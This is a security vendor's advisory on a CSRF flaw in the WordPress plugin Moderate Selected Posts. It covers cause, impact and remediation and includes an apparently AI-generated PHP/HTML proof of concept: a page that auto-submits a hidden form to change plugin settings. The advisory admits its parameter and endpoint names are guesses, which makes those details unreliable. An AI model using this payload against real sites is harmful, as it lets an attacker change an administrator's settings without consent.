Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14907: Moderate Selected Posts <= 1.4 – Cross-Site Request Forgery to Plugin Settings Update (moderate-selected-posts)

Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.4
Patched Version
Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14907 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the WordPress Moderate Selected Posts plugin up to version 1.4. The vulnerability allows unauthenticated attackers to change plugin settings by tricking an administrator into clicking a malicious link. The CVSS score of 4.3 (Medium) reflects the requirement for user interaction and the limited impact of settings modification.

Atomic Edge research identifies the root cause as a missing nonce check on the `msp_admin_page()` function. This function handles form submissions for plugin settings. The CWE-352 classification confirms the absence of a CSRF token. This conclusion is inferred from the vulnerability description and standard WordPress security patterns. Without source code, we cannot confirm the exact function signature or the specific parameters it processes.

Exploitation requires an attacker to craft a malicious web page or link that sends a forged HTTP POST request to the plugin’s admin endpoint. The target must be a logged-in WordPress administrator. The likely endpoint is `/wp-admin/admin.php?page=moderate-selected-posts` or a similar admin menu page registered by the plugin. The payload would contain POST parameters that match the plugin’s settings fields, such as `msp_option` or similar. The attack succeeds because the request lacks a nonce validation step.

Remediation requires adding a nonce check to the settings update handler. The plugin developer must call `wp_verify_nonce()` on a `_wpnonce` parameter before processing any form submission. The function `check_admin_referer()` could also be used. This fix aligns with WordPress coding standards for all administrative forms. A capability check, like `current_user_can(‘manage_options’)`, should already be present but must be verified.

The impact of successful exploitation is unauthorized modification of plugin configuration. This could alter the plugin’s behavior, such as changing which posts are moderated or modifying display settings. The vulnerability does not directly lead to privilege escalation, remote code execution, or data theft. However, changed settings could disrupt site functionality or enable other attack vectors if the settings control security-related features.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14907 - Moderate Selected Posts <= 1.4 - Cross-Site Request Forgery to Plugin Settings Update
<?php
/**
 * Proof of Concept for CVE-2025-14907.
 * This script generates a malicious HTML page that forges a POST request to the Moderate Selected Posts plugin admin page.
 * It assumes the plugin's settings page slug is 'moderate-selected-posts' (common pattern).
 * The specific settings parameter name is unknown; 'msp_settings' is a plausible guess.
 * A real attacker would host this page and lure a target administrator to visit it.
 */

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php?page=moderate-selected-posts'; // CONFIGURE THIS
// Assume a settings parameter. Without the source code, the exact parameter name is inferred.
$malicious_setting_value = 'attacker_controlled_value';
?>
<!DOCTYPE html>
<html>
<head>
    <title>Benign Page</title>
</head>
<body>
    <h1>Click to proceed</h1>
    <!-- The form automatically submits via JavaScript when the page loads -->
    <form id="exploitForm" method="POST" action="<?php echo htmlspecialchars($target_url); ?>">
        <!-- The assumed vulnerable parameter. In a real plugin, this could be any setting field. -->
        <input type="hidden" name="msp_settings" value="<?php echo htmlspecialchars($malicious_setting_value); ?>" />
        <!-- Other potential parameters might be needed based on the actual plugin code. -->
        <input type="hidden" name="action" value="update" />
    </form>
    <script>
        // Auto-submit the form to simulate a single click/link interaction.
        document.getElementById('exploitForm').submit();
    </script>
</body>
</html>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School